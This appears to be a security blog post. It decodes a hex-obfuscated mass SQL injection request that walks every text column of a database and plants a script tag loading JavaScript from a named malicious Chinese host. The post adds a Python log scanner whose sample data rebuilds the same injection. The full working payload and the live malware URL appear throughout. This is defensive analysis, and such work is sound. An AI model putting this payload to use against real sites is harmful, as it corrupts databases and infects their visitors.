Information, OpenSourceSoftware, Security

Those Chinese!

As an exercise for myself, and because I'm curious by nature… I had to find out what kind of Chinese attacks are hitting my sensors today. It is one thing to see that it's a SQLi attempt and *move on*; it is another to really see what they are trying to do. And by using Google, one can get an idea of the extent of such an attack. So here goes:

The URL that is triggering my sensors:
;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343030302920444
5434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612
C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747
970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F
4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2065786563282775706461746520
5B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E
636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C
2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2
D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F7220444
5414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1

If you can decode the hex string just by looking at it, you are way ahead of me… If not, you are probably just normal, and perl can be a good friend:

# echo "0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F722043
5552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061
2E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D3233312
06F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F20
40542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275
D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F73637269
70743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687
474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020
5461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72"
|perl -pe 's/(..)/chr(hex($1))/ge' | hexdump -C

Will give you something like this:

00 44 45 43 4c 41 52 45 20 40 54 20 76 61 72 63 |.DECLARE @T varc|
68 61 72 28 32 35 35 29 2c 40 43 20 76 61 72 63 |har(255),@C varc|
68 61 72 28 34 30 30 30 29 20 44 45 43 4c 41 52 |har(4000) DECLAR|
45 20 54 61 62 6c 65 5f 43 75 72 73 6f 72 20 43 |E Table_Cursor C|
55 52 53 4f 52 20 46 4f 52 20 73 65 6c 65 63 74 |URSOR FOR select|
20 61 2e 6e 61 6d 65 2c 62 2e 6e 61 6d 65 20 66 | a.name,b.name f|
72 6f 6d 20 73 79 73 6f 62 6a 65 63 74 73 20 61 |rom sysobjects a|
2c 73 79 73 63 6f 6c 75 6d 6e 73 20 62 20 77 68 |,syscolumns b wh|
65 72 65 20 61 2e 69 64 3d 62 2e 69 64 20 61 6e |ere a.id=b.id an|
64 20 61 2e 78 74 79 70 65 3d 27 75 27 20 61 6e |d a.xtype='u' an|
64 20 28 62 2e 78 74 79 70 65 3d 39 39 20 6f 72 |d (b.xtype=99 or|
20 62 2e 78 74 79 70 65 3d 33 35 20 6f 72 20 62 | b.xtype=35 or b|
2e 78 74 79 70 65 3d 32 33 31 20 6f 72 20 62 2e |.xtype=231 or b.|
78 74 79 70 65 3d 31 36 37 29 20 4f 50 45 4e 20 |xtype=167) OPEN |
54 61 62 6c 65 5f 43 75 72 73 6f 72 20 46 45 54 |Table_Cursor FET|
43 48 20 4e 45 58 54 20 46 52 4f 4d 20 20 54 61 |CH NEXT FROM  Ta|
62 6c 65 5f 43 75 72 73 6f 72 20 49 4e 54 4f 20 |ble_Cursor INTO |
40 54 2c 40 43 20 57 48 49 4c 45 28 40 40 46 45 |@T,@C WHILE(@@FE|
54 43 48 5f 53 54 41 54 55 53 3d 30 29 20 42 45 |TCH_STATUS=0) BE|
47 49 4e 20 65 78 65 63 28 27 75 70 64 61 74 65 |GIN exec('update|
20 5b 27 2b 40 54 2b 27 5d 20 73 65 74 20 5b 27 | ['+@T+'] set ['|
2b 40 43 2b 27 5d 3d 27 27 22 3e 3c 2f 74 69 74 |+@C+']=''"></tit|
6c 65 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 |le><script src="|
68 74 74 70 3a 2f 2f 77 77 77 30 2e 64 6f 75 68 |http://www0.douh|
75 6e 71 6e 2e 63 6e 2f 63 73 72 73 73 2f 77 2e |unqn.cn/csrss/w.|
6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 21 2d |js"></script><!-|
2d 27 27 2b 5b 27 2b 40 43 2b 27 5d 20 77 68 65 |-''+['+@C+'] whe|
72 65 20 27 2b 40 43 2b 27 20 6e 6f 74 20 6c 69 |re '+@C+' not li|
6b 65 20 27 27 25 22 3e 3c 2f 74 69 74 6c 65 3e |ke ''%"></title>|
3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 |<script src="htt|
70 3a 2f 2f 77 77 77 30 2e 64 6f 75 68 75 6e 71 |p://www0.douhunq|
6e 2e 63 6e 2f 63 73 72 73 73 2f 77 2e 6a 73 22 |n.cn/csrss/w.js"|
3e 3c 2f 73 63 72 69 70 74 3e 3c 21 2d 2d 27 27 |></script><!--''|
27 29 46 45 54 43 48 20 4e 45 58 54 20 46 52 4f |')FETCH NEXT FRO|
4d 20 20 54 61 62 6c 65 5f 43 75 72 73 6f 72 20 |M  Table_Cursor |
49 4e 54 4f 20 40 54 2c 40 43 20 45 4e 44 20 43 |INTO @T,@C END C|
4c 4f 53 45 20 54 61 62 6c 65 5f 43 75 72 73 6f |LOSE Table_Curso|
72 20 44 45 41 4c 4c 4f 43 41 54 45 20 54 61 62 |r DEALLOCATE Tab|
6c 65 5f 43 75 72 73 6f 72 0a |le_Cursor.|

Which spells out two things for me. First, there is the SQL command itself, which is cool 🙂 : a cursor over sysobjects and syscolumns that walks every text and char column of every user table in the database and appends the script tag to each value.

Then we have the evil JavaScript, which is meant to hit everyone who visits your website!

http://www0.douhunqn.cn/csrss/w.js
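The same decoding as a reusable check, as an added example and not code from the original post: it URL-decodes request lines, pulls every CAST(0x…) hex blob out, decodes it, and lists the script src URLs the injected UPDATE would plant, so the check can run over a whole web log rather than one pasted string. The log lines and the attacker.example host are constructed sample data; the NCHAR/NVARCHAR (UTF-16LE) branch covers a variant encoding of the same trick and is my generalization beyond the CHAR(4000) case shown above.

```python
import re
from urllib.parse import unquote

# The declared type after the hex blob tells us how to decode the bytes
# (CHAR/VARCHAR = single-byte, NCHAR/NVARCHAR = UTF-16LE).
CAST_RE = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?(?:VAR)?CHAR)\b", re.I)
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)

def decode_cast_payloads(request_line):
    """URL-decode one request line and return every CAST(0x...) blob as text."""
    decoded = unquote(request_line)
    payloads = []
    for hexstr, sqltype in CAST_RE.findall(decoded):
        if len(hexstr) % 2:        # odd digit count: pad to whole bytes
            hexstr = "0" + hexstr
        raw = bytes.fromhex(hexstr)
        enc = "utf-16-le" if sqltype.upper().startswith("N") else "latin-1"
        payloads.append(raw.decode(enc, errors="replace"))
    return payloads

def extract_script_sources(sql):
    """Script URLs the injected UPDATE would write into every text column."""
    return sorted(set(SCRIPT_SRC_RE.findall(sql)))

def scan_log(lines):
    """(line number, script URLs) for each request carrying a CAST(0x...) payload."""
    findings = []
    for n, line in enumerate(lines, 1):
        for sql in decode_cast_payloads(line):
            findings.append((n, extract_script_sources(sql)))
    return findings

# Constructed sample: the DECLARE/CURSOR/exec('update ...') shape decoded above,
# with a made-up host, hex-encoded like the real request, next to a benign one.
INJECTED_SQL = (
    "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and "
    "a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''\"></title>"
    "<script src=\"http://attacker.example/w.js\"></script><!--''+['+@C+']') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor"
)
SAMPLE_LOG = [
    "GET /page.asp?id=1 HTTP/1.1",
    "GET /page.asp?id=1;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
    + INJECTED_SQL.encode("latin-1").hex().upper()
    + "%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1",
]
```

Feed `scan_log()` the request lines from an IIS or Apache access log and every hit names the script host to block at the proxy and to search for in your own pages.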

Then, for the Google search of this specific attack:

http://www.google.no/search?hl=en&q="script+src%3Dhttp%3A%2F%2Fwww0.douhunqn.cn%2Fcsrss%2Fw.js"&btnG=Search

Which gives me 18,800 hits at the moment. Editing the search makes things look even worse 🙂
I even see banks in the hits from Google 🙂


UPDATE: 5 Hours later – Google reports 19,700 Hits
UPDATE: 27 Hours later – Google reports 2,070 Hits
